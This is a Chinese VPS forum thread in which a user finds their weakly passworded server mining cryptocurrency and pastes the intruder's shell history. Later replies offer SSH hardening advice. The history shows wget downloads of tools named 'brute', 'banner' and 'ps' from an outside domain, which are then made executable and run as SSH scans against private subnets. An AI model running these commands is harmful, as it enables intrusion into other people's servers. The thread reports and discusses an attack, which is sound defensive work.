一不小心被挖矿了

c菌

防范意识薄弱，小鸡用的弱密码，没禁用密码登陆，今天登上机器看cpu100%，
马上意识到被挖矿了。看了下历史记录

1. sudo -i
   
2.   133  exit
   
3.   134  nproc
   
4.   135  lscpu
   
5.   136  exit
   
6.   137  nproc
   
7.   138  exit
   
8.   139  nproc
   
9.   140  ls
   
10.   141  ip r
    
11.   142  exit
    
12.   143  wget david1337.dev/brute
    
13.   144  wget david1337.dev/banner
    
14.   145  wget david1337.dev/ps
    
15.   146  chmod +x *
    
16.   147  ip r
    
17.   148  ./ps 10.42 22
    
18.   149  ./ps 192.168 22
    
19.   150  ./ps 172.17 22
    
20.   151  ls
    
21.   152  exit
    
22.   153  lscpu
    
23.   154  ls
    
24.   155  exit
    
25.   156  top
    
26.   157  exit
    
27.   158  clear
    
28.   159  ls

复制代码

淦塔皮燕纸 david1337.dev

toot

拿到鸡第一步。修改密码，3种混合。修改22端口。开启bbr

c菌

toot 发表于 2022-2-15 23:16
拿到鸡第一步。修改密码，3种混合。修改22端口。开启bbr

不放心还是重装了

konololi

第一步不就是禁密码登录改成密钥么，
密钥还更方便

como

端口只对白名单ip开放，稳得一比，你密码设置123都没问题

HOH

这个矿工不专业，鞋套都不戴，差评

hcyme

密钥，其他都是默认，dmit什么的开机就是密钥，更规范

冲浪麦浪花郎

https://52.ht/thread-957070-1-1.html




* Linux常用命令：rar a file1.rar file1 file2 dir1 同时压缩 'file1', 'file2' 以及目录 'dir1'



* 资源 https://t.me/MJJ_aliyundrive
* MJJ频道 https://t.me/wearemjj
* Linux命令大全 https://www.linuxcool.com
* HostLoc频道 https://t.me/myhostloc
   

母鸡给的邀请码

三个脚本被删除了。楼主有备份吗 发出来学习下